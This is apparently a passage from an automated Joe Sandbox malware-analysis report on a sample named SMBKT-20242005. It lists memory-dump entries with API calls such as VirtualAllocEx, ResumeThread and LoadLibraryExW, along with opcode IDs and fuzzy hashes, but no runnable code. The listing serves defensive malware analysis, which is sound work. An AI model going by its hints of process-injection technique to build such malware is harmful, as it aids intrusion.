                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_1370000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: c811788f7fc502cab5fde960ef864ff3e19f985232b2aae06f3f76af7f96d678
                          • Instruction ID: d8ad3f8fcb71a8e8aaf5cb7a69f1c3b96d3647860e7e432e9f38871d22538808
                          • Opcode Fuzzy Hash: c811788f7fc502cab5fde960ef864ff3e19f985232b2aae06f3f76af7f96d678
                          • Instruction Fuzzy Hash: 4A1123B68003098FDB20DF9AC444BDEFBF4EB48324F10842EE919A7600C379A945CFA5
                          APIs
                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0137B459,00000800,00000000,00000000), ref: 0137B66A
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_1370000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 05c411c2344340283a0477e67644323be973220b6b7a5e87114cf94262f34fda
                          • Instruction ID: 753ca45e9846db63134e8c7414cc277e41d0a3a1cd1a1d79e73c6c7ed2d4dc7b
                          • Opcode Fuzzy Hash: 05c411c2344340283a0477e67644323be973220b6b7a5e87114cf94262f34fda
                          • Instruction Fuzzy Hash: 891112B68003098FDB20CF9AC844BDEFBF4EB88324F11842AD959A7610C379A545CFA5
                          APIs
                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04DF2ACE
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: b4081939bf1795afc6435a1b3580473334ab753a2f20de0b92c0cab8885a46b7
                          • Instruction ID: aaeaf7f98d67bab656e5ff8058b44ecbc9c8ab8b44a7828120c69d9f16785c78
                          • Opcode Fuzzy Hash: b4081939bf1795afc6435a1b3580473334ab753a2f20de0b92c0cab8885a46b7
                          • Instruction Fuzzy Hash: AA1149768003499FDB20DFAAC845BDFBBF5EF48320F14841AE519A7250C776A550CFA1
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 7f48809c4761b8d3da9bb75c16d2094071ad7023ed18f01217c545a5bf8c43d4
                          • Instruction ID: d70f93ae88ac55e1a0ab549272ef3a2ffc5ab810a49780753d88d26c5d80d720
                          • Opcode Fuzzy Hash: 7f48809c4761b8d3da9bb75c16d2094071ad7023ed18f01217c545a5bf8c43d4
                          • Instruction Fuzzy Hash: CF115B718043498BDB20DFAAC8457EFFBF4EF48320F24841AD569A7380CB79A544CBA0
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: ResumeThread
                          • String ID:
                          • API String ID: 947044025-0
                          • Opcode ID: 660f31d704217713fc49fd7adb404647d612a12adae89df69a97ee300d4be270
                          • Instruction ID: 444156c7eb4ea95076861b6b6ddfca3dafdd2f7d883e95fd88b5a621b7936222
                          • Opcode Fuzzy Hash: 660f31d704217713fc49fd7adb404647d612a12adae89df69a97ee300d4be270
                          • Instruction Fuzzy Hash: E61128B19003498BDB20DFAAC8457DEFBF5AF48314F148419D519A7340CB79A544CBA1
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 04DF71FD
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: fd94590c2ea0472b4ffe1de39133b5813e4cdf0372010d04ca71431222f9aa4d
                          • Instruction ID: 29666c6829bb3a173b3c88df3529e95664767efac07644959a63209ca883fb3c
                          • Opcode Fuzzy Hash: fd94590c2ea0472b4ffe1de39133b5813e4cdf0372010d04ca71431222f9aa4d
                          • Instruction Fuzzy Hash: 6F1125B58003499FDB20DF9AD844BDEBFF8FB48310F10845AE954A3211C375A554CFA1
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 04DF71FD
                          Memory Dump Source
                          • Source File: 00000001.00000002.1463956684.0000000004DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4df0000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: MessagePost
                          • String ID:
                          • API String ID: 410705778-0
                          • Opcode ID: 5cad66747c627e529c17d3010e75a9de2b5c4888060e4ed40cb4be2fdf6aa9dd
                          • Instruction ID: efaba522fbb7ed75b5ed7140b8f81f076d28a0ee57017a680fa72dda581506f8
                          • Opcode Fuzzy Hash: 5cad66747c627e529c17d3010e75a9de2b5c4888060e4ed40cb4be2fdf6aa9dd
                          • Instruction Fuzzy Hash: F01103B58003499FDB20DF9AD885BDEBBF8FB48310F11841AE958A7340D3B5A944CFA1
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0137B3DE
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460819095.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_1370000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 2ef6f0c85d4c90740ec9583919b346435f5f178431570216b69d2efd3c40ef95
                          • Instruction ID: 91c2532b18ff32fe0f8ec1f0adda6aeb90dfc2381fd6fc02de027adb70a0e749
                          • Opcode Fuzzy Hash: 2ef6f0c85d4c90740ec9583919b346435f5f178431570216b69d2efd3c40ef95
                          • Instruction Fuzzy Hash: E011E0B5C006498FEB20CF9AC444BDEFBF4EF88214F10842AD929A7650D379A545CFA1
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: uS[
                          • API String ID: 0-1911296808
                          • Opcode ID: 9f278e811f4a128a0139782b95c7496721a8bdb951bbf8250584da29938c0301
                          • Instruction ID: b6ba9ea664c4266f2cb5294d348c66dfe2ee57d14f520d394e3792ff7b30f581
                          • Opcode Fuzzy Hash: 9f278e811f4a128a0139782b95c7496721a8bdb951bbf8250584da29938c0301
                          • Instruction Fuzzy Hash: E351E375905244CFDB40DFA4E989AECBBF5FB09302F1495A9D485DB386EBB09841CF50
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: uS[
                          • API String ID: 0-1911296808
                          • Opcode ID: 991ebcf71abec740ef17a841016c750004cc9acc1ed4a3c2b2bc1a86445ac4c2
                          • Instruction ID: bbe8f2f193128da31dcd9a880a1dd157839c0bc09de9800d84db518bc2733d42
                          • Opcode Fuzzy Hash: 991ebcf71abec740ef17a841016c750004cc9acc1ed4a3c2b2bc1a86445ac4c2
                          • Instruction Fuzzy Hash: BD014FB0A05349CFDB40EFD4E845AEC77B6FB48301F109A55D416EF788E77198458B60
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: uS[
                          • API String ID: 0-1911296808
                          • Opcode ID: 3e61bd23446458af9e167d5fe703f85bbacca93abe44eff126922fac10a15921
                          • Instruction ID: 39d10c01483cc6889dd2c1988652818582c0f1cf1b9ea16f56d2af78fdcd11f1
                          • Opcode Fuzzy Hash: 3e61bd23446458af9e167d5fe703f85bbacca93abe44eff126922fac10a15921
                          • Instruction Fuzzy Hash: 33F06D70A093898FCB40EFE4E854AEC7BB1FB48300F209A16D4559F789E7305845CB60
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: un
                          • API String ID: 0-3067141278
                          • Opcode ID: e88280ed63f27f83321441e0cce917b3b2b5d78d18d3b8401f9af22ec7b0face
                          • Instruction ID: e1b8fec94b52578ef70ebc056e802bf56b06080f6ba60ca62b44c00b12c00e3d
                          • Opcode Fuzzy Hash: e88280ed63f27f83321441e0cce917b3b2b5d78d18d3b8401f9af22ec7b0face
                          • Instruction Fuzzy Hash: 4EE04F2618C3C4AFDF221BA098216753F799B5361AF1D50AFE1C4891A2D9978406C735
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID: un
                          • API String ID: 0-3067141278
                          • Opcode ID: fe2f3a90d41fc91201be7915e85a23d1cb2cff28174cb0f5d8298cd95dc6b937
                          • Instruction ID: 17ad87d83652d557a92e057a77d8c0be62a5a5a56dbd949dd0a93fc7493de1fc
                          • Opcode Fuzzy Hash: fe2f3a90d41fc91201be7915e85a23d1cb2cff28174cb0f5d8298cd95dc6b937
                          • Instruction Fuzzy Hash: A0D05B3638431CEBDF3456D1E416739326DA795606F24811FF54595194DEB68400C735
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6cb7f6b20f2731ef5553bb7429d375c34320ba1954d13bbd44541fb99f0006b5
                          • Instruction ID: c03849c6c3eb0d27d7d8848a47a050e77d0875251dc85cee5631b234b213ed96
                          • Opcode Fuzzy Hash: 6cb7f6b20f2731ef5553bb7429d375c34320ba1954d13bbd44541fb99f0006b5
                          • Instruction Fuzzy Hash: 81717136E48218DFDF15CB98C444BADB7B2FF90306F14942BE491AB2A4DBB09D42CB51
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9804ee6e91dcf1f154f8267004d171ff9552206efcab858f9df763656cb4b9eb
                          • Instruction ID: 3cfe6de4a4b846eca715c8519ec4161a6b0455b97d423823bc450517eafacdd0
                          • Opcode Fuzzy Hash: 9804ee6e91dcf1f154f8267004d171ff9552206efcab858f9df763656cb4b9eb
                          • Instruction Fuzzy Hash: E2518A327002058FDB25DF68C494BAAB7E6AF88319F14416DD45ACB3A0DBB5EC41CB50
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 29af3437b494ae8f36dc5c70d24c3d50d9e97809dd0189c6e9945a9e0b5cbd4b
                          • Instruction ID: f82985f7eb005ad0d348a9b8578f136b39fb556b104f1ac159de8a38088508e7
                          • Opcode Fuzzy Hash: 29af3437b494ae8f36dc5c70d24c3d50d9e97809dd0189c6e9945a9e0b5cbd4b
                          • Instruction Fuzzy Hash: 9E51B431A002099FDF05DFB488103AE7BB6BF8A211B148569D455EB384DE39D9418795
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: edc257c363d2792261816ae611d4d40af787c719ab8580d1d659801150f45946
                          • Instruction ID: f0282501b0849f292a4f76fa79663c7c04e527956a044d111607a1a426a82635
                          • Opcode Fuzzy Hash: edc257c363d2792261816ae611d4d40af787c719ab8580d1d659801150f45946
                          • Instruction Fuzzy Hash: 6051A2317002059FDB16DF68C484B9EB7F6AF89319F18816DD44A9B3A1DBB5EC01CB91
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6fbebfcde155625eca1ead38fbc7abe833c273e5754235ca13664c16c5b728cc
                          • Instruction ID: 47093cc095b3ace4d0b74dad5aa690e2445f6348d6e025390f33918ef8367e80
                          • Opcode Fuzzy Hash: 6fbebfcde155625eca1ead38fbc7abe833c273e5754235ca13664c16c5b728cc
                          • Instruction Fuzzy Hash: A3412932740A10DFDB24D728D8047ABB7D5EBC5326F44956ED4998B240CBB4E846CB91
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 83909935416679c56331e397205f2d40cb2f5708cdc9a8750399f867e486ca7d
                          • Instruction ID: 6a7c19009ae1454bc90f5c5251fc8ba7c21e8c3792d9422da9f25a9f08bd3f76
                          • Opcode Fuzzy Hash: 83909935416679c56331e397205f2d40cb2f5708cdc9a8750399f867e486ca7d
                          • Instruction Fuzzy Hash: 2831C172A54265CFCF04CF69C8806EEF7B4FF49212F44923AE899D7261C3B4D9418B91
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 42644bc471a8c99b2cd6e6d9fa209f7ec338cb16dcf9257d9696772f26f4e94a
                          • Instruction ID: ce02c5120aa41d901eade72b63693c7ec30bf8e64a42e2a2e32bedb957e52742
                          • Opcode Fuzzy Hash: 42644bc471a8c99b2cd6e6d9fa209f7ec338cb16dcf9257d9696772f26f4e94a
                          • Instruction Fuzzy Hash: D131A072A04265CFCF04CF69C9406EEF7B0FF4A212F44523AE599D72A5D3B4D9418B91
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ab25cd6283ddfeadb8d1068d061452f631d4843b32b6c220a9e533d5950975ae
                          • Instruction ID: 29b306d73e31967981c667efc02a1370381c7574da9089349b737518584b3e65
                          • Opcode Fuzzy Hash: ab25cd6283ddfeadb8d1068d061452f631d4843b32b6c220a9e533d5950975ae
                          • Instruction Fuzzy Hash: 9021A1367502108FCF18DB29D41496D33E9FF9866A71540AEE945CB3B0EEB1DC02CBA4
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aae42cd78d63b37af978d5f8213a256652c0b687ffbaec0804b6e1a22eb1e57b
                          • Instruction ID: 65642af0c9e013d0cc1a73ed67dc28b4f3959a72e6c7e94670d4563bbb516723
                          • Opcode Fuzzy Hash: aae42cd78d63b37af978d5f8213a256652c0b687ffbaec0804b6e1a22eb1e57b
                          • Instruction Fuzzy Hash: EE31D6B5E042199FCB44CFA9C581AAEFBF2FF88300F10956AD819A7314D7799A42CF50
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e8bdda3a7f29f0eeb50bbbcc62119f8a42d203a83d5b770bb177bacb0bc87379
                          • Instruction ID: 4c6ad93eeb6c66bbc4bd33a9277aa9ddcf474bbb4053ab1bc6e5c8850f37ffa9
                          • Opcode Fuzzy Hash: e8bdda3a7f29f0eeb50bbbcc62119f8a42d203a83d5b770bb177bacb0bc87379
                          • Instruction Fuzzy Hash: F231C3B5E042199FCB44CFAAC5819AEFBF2FF88301F10956AD819A7314E7759A41CF90
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460203724.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_101d000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c315d069a46438744ff281c340311ac048a97438339ebc5a29bf085521a303ed
                          • Instruction ID: 99d5e488d355bd70a5a878be04152d5ba1d31b3a6c6b7c960fd9553c9b573193
                          • Opcode Fuzzy Hash: c315d069a46438744ff281c340311ac048a97438339ebc5a29bf085521a303ed
                          • Instruction Fuzzy Hash: 18212571500240DFDB15DF94D9C4B2ABFA5FB88318F24C5A9E8490B25AC33AD456CBA2
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 274e1704b2e9c07ca6c8841f6449ddc28bc0aef61e425765bf1dece689b5c828
                          • Instruction ID: 8277d817e6d59a087542ccc7448b34654a0a526b4e618bfdd93456f13bf02cec
                          • Opcode Fuzzy Hash: 274e1704b2e9c07ca6c8841f6449ddc28bc0aef61e425765bf1dece689b5c828
                          • Instruction Fuzzy Hash: EA316DB5905245CFDB40DFA8E549AEDBBF0FB08306B04A56AD849DB352DBB58C40CF10
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ee2ca8be47d1241afb2fc64ea1c79ced4823858483b86b80d91d5d7faf7522aa
                          • Instruction ID: 0a931f45e5b713c8fd3a74dd5986673df58b129a43e3814cd61467f14cfe447f
                          • Opcode Fuzzy Hash: ee2ca8be47d1241afb2fc64ea1c79ced4823858483b86b80d91d5d7faf7522aa
                          • Instruction Fuzzy Hash: 1431FCB1E00219DFDB04CFA9C58199EFBF6FF88300F14D569D419A7314D7749A018B91
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460258881.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_102d000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aec898ae4a49df7c15f8c9a2a9e4ee60c282715c772c001ffb917dd610cc7f84
                          • Instruction ID: 53f0e1a5efb01a8d9998081aa3b0e4df6b99c4e55c4e242a4b25f9f0e77c135f
                          • Opcode Fuzzy Hash: aec898ae4a49df7c15f8c9a2a9e4ee60c282715c772c001ffb917dd610cc7f84
                          • Instruction Fuzzy Hash: 88214671904300EFDB05DF94D9C0B2ABBA5FB95324F24C5ADE8894B282C336DC0ACB61
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460258881.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_102d000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bb2f702d85bd7abbdbd1f72fedf41f1d7fbdf954c23a4f8bcc74e16485081f55
                          • Instruction ID: b973182520b44c0aa9210bfcb950905d770fc5cff54dc9f507b94a4a3d42ce72
                          • Opcode Fuzzy Hash: bb2f702d85bd7abbdbd1f72fedf41f1d7fbdf954c23a4f8bcc74e16485081f55
                          • Instruction Fuzzy Hash: 2B213771504340DFDB15DF94D4C0B1ABBA5FB84314F24C5ADE98A4B2A2C33AD807CB61
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 82707d8ae51d65391665e05086aaf667711d5b743e5e6e8fb0e02e619f30d45d
                          • Instruction ID: c4bd81dce29fa4dfdb42dbca92bcdc33c4c2adc53f4e7fc81a55a8b7e1ebe6de
                          • Opcode Fuzzy Hash: 82707d8ae51d65391665e05086aaf667711d5b743e5e6e8fb0e02e619f30d45d
                          • Instruction Fuzzy Hash: 4021D7B1E04219DFCB44CFA9C5809AEFBF2BF89300F10D5AAD459A7314D7749A018F91
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b36bb0068449401991329365c6eefbb60f5fd7b1349c3f0ad900379ac2925fdc
                          • Instruction ID: a215e54d4243aac08bce7a63f2c9b0f3fac5434d6f92477f447858065cfe06f5
                          • Opcode Fuzzy Hash: b36bb0068449401991329365c6eefbb60f5fd7b1349c3f0ad900379ac2925fdc
                          • Instruction Fuzzy Hash: 9C11B2377502008FCF18DB6AD804A5D37E9FF9922AB1540AEE505CB3A1EAB1DC02CB64
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f9a2b0aed2aecbb5625cfa35b1827acd96178f173a66f6999598e919dc064a4c
                          • Instruction ID: 5de9721bd6cf57579150414f379113c3e9d0d4e6ae795a62788c7ff0091d7a66
                          • Opcode Fuzzy Hash: f9a2b0aed2aecbb5625cfa35b1827acd96178f173a66f6999598e919dc064a4c
                          • Instruction Fuzzy Hash: CD313675902204CFDB54DF64E588AECBBB5FB09302F50A5A9E48AD7306EBB09C80CF51
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c9670dac01b32b3cb668318a05c2a736d8a44530bc712b6e9ecec822a31f0caf
                          • Instruction ID: 92a91aa3b9708e98d76a79b0cb8ebda59320148df612342ab2ab005c8de9148f
                          • Opcode Fuzzy Hash: c9670dac01b32b3cb668318a05c2a736d8a44530bc712b6e9ecec822a31f0caf
                          • Instruction Fuzzy Hash: F9215A75902204CFCB94DFA4E589AACBBF5FB08302F5490A9D489D7352EB749C80CF20
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460258881.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_102d000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a683a21b82c5f6fe049a38f0a43d2393bf16a46f3acc6924f79bc01b2f4e0e03
                          • Instruction ID: 00f12063093ed8cd2cdd9928c701996dd37178c0ce7522257b26ae7df7471acd
                          • Opcode Fuzzy Hash: a683a21b82c5f6fe049a38f0a43d2393bf16a46f3acc6924f79bc01b2f4e0e03
                          • Instruction Fuzzy Hash: F92180755083809FCB12CF64D9D4711BFB1EB46214F28C5DAD8898F2A7C33A9856CB62
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460203724.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_101d000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                          • Instruction ID: 7370e7430aaf69d446ed85d92e1fdbc69bc1e19070f4e6e736ea20fdcfd0d323
                          • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                          • Instruction Fuzzy Hash: 5311B176504280CFCB16CF54D5C4B56BFB1FB84318F24C6A9D8490B65BC33AD456CBA1
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e690be510309931c221d0fb7c7d15fd8f6b7c1e64de8ba426c8ded40af802008
                          • Instruction ID: 953801cd03a999ca73874ba42af37c6c2362aeb35d7d74ce8dd332055ac77ea6
                          • Opcode Fuzzy Hash: e690be510309931c221d0fb7c7d15fd8f6b7c1e64de8ba426c8ded40af802008
                          • Instruction Fuzzy Hash: AD112930600308EFEB15EBB4C814B9D7F76FF86210F2482A9E1999B2D5CA758D47C751
                          Memory Dump Source
                          • Source File: 00000001.00000002.1460258881.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_102d000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                          • Instruction ID: 690e2f089755c86c220f4bc413ee0fd0bfa9e87a7783c4d9be80083a029572eb
                          • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                          • Instruction Fuzzy Hash: 7E11BB75504280DFDB02CF54C5C0B15FBA1FB85224F28C6AAD8894B696C33AD84ACB61
                          Memory Dump Source
                          • Source File: 00000001.00000002.1465936940.0000000008E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E90000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8e90000_SMBKT-20242005.jbxd
                          Similarity
                          • API ID:
                          • String ID:
